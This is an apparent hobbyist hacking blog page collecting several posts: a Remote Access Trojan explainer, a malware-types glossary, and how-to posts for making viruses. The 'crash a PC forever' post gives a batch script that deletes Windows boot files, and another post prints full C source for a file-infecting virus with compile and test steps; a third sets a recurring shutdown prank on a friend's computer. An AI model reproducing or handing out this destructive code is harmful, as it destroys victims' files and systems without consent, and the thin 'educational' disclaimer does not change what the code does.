Breaking News
Loading...

Recent Post

Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts
Sunday, December 15, 2013
What is RAT (Remote Access Trojan) ?

What is RAT (Remote Access Trojan) ?

RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basicly anything with your computer. Using RAT hacker can install keyloggers and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.

What is RAT ?

As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.

What You can do with RAT ?

Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:
->Infecting Files
->Installing Keyloggers
->Controlling Computer
->Remotely start webcam, sounds, movies etc
->Using your PC to attack Website (DDOS)
->View Screen
->Harmless RAT or Good RAT

As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one's computer with his permission for file transfer, sharing your screen and more.

Some Commonly Used RAT

1.ProRAT
2.CyberGate RAT
3.DarkComet RAT

Monday, April 15, 2013
no image

How to make a virus in Notepad??

HERE THERE R SOME EXCELLENT VIRUS SCRIPTS OF WEBS MOST DANGEROUS SCRIPTS ALSO INCLUDED IN THEM


How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**
Wednesday, July 18, 2012
How to Create a Computer Virus?

How to Create a Computer Virus?













This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
  
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE
Monday, July 9, 2012
no image

Shutdown Virus


Wanna know how to make shutdown virus?
Right Click on desktop of your friend...
> New> Shortcutand then type
Shutdown -s -t 18 -c "Your Message..."
>click next
>give any name
> click finish
Run that file...
That computer will get shutdown after 18seconds on each Restart..
and your message will show with a ok button on screen

How to disable?
Go to Run
>Type Shutdown -a
Press EnterDone!!!!Too Old But New for Noobs and Many are here even we are also still noobs lol... :P :) :D
Different Types of Viruses in Computer and Malwares

Different Types of Viruses in Computer and Malwares


What are the differences between malware, spyware and adware?Is virus a type of malware?
These are some common questions asked by most computer users.
Therefore, I gonna explain the different types of viruses in computer and malicious softwares.  You will be able to understand clearly about the differences between viruses, malware, spyware etc. in this article.
WHAT IS COMPUTER VIRUS?
A program that infects and attacks a computer negatively by interfering the way the computer works without permission of the user(s). Virus can spread from one computer to another by copying itself. Virus is commonly refers to all types of malwares, which is wrong. It is a type of malware and different from worms, trojan horses etc.


WHAT IS MALWARE?
Malware stands for malicious software, which means harmful software that alters the computer’s operation and gain access into a computer system without user’s knowledge. It is a general term that is used to describe all types of harmful and hostile softwares, which includescomputer viruses, worms, trojan horse, rootkit, back doors, spywares, andadwares. Each type of malware works differently and I will cover all of them briefly for you. I will start with computer worm as I have explained what virus is.

1. Computer Worm

A program that replicates itself repeatedly in the computer or on a network. It causes overload of memory or network by using up resources or bandwidth. As a result, the computer might shut down or congests the network. Unlike virus, it does not corrupt and access files in computer.
2. Trojan Horse


A program that hides inside a legitimate program. Usually, when the user runs or installs a program, it will trigger the trojan horse and harms the PC. It does not replicate itself to other computers.
3. Rootkit
A program that hides itself in a PC and allows someone to have administrator-level access of the computer. Once the rootkit is installed, the cracker can change settings, execute programs, monitor activity etc. via network. It is illegal when the rootkit author intrudes the computer without the user’s permission.
4. Back door
Programmers usually build back doors into programs during system development to save time. While testing and writing programs, they can bypass security controls and make changes. However, hackers use this method to access the computer remotely without the user’s knowledge. Back door can be a rootkit. Some worms too leave back doors, which have been used to distribute junk e-mail or spread other worms.
5. Spyware


Software that collects personal identification information via internet without the user’s permission. It often exists as an add-on of a program. In most cases, the user did not read the End User License Agreement (EULA) completely, and hackers take advantage of it. They wrote a few lines about the user’s privacy statement in the EULA. As a result, most users agree to it without reading thus spyware is installed in their system without knowing it.
6. Adware
Stands for advertising-supported software, is a software application that displays advertisements when a program (usually freeware) is running. It can be harmful when an adware collects an user’s personal information to display ads according to the user’s internet surfing habit. Harmful adware is a form of spyware as it invades user’s privacy.
I hope you have understood the differences of each and every malware. This can be useful for you to have some basic knowledge about the definition of virus and types of malicious software in computer
Copyright © 2012 DzireZOne All Right Reserved
Designed by Pirate Rex